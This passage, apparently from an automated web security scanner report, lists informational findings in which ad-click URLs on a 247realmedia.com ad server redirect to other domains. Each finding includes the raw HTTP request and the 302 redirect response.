Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.147. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.149. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

20.151. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.156. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x

The response contains the following link to another domain:

http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
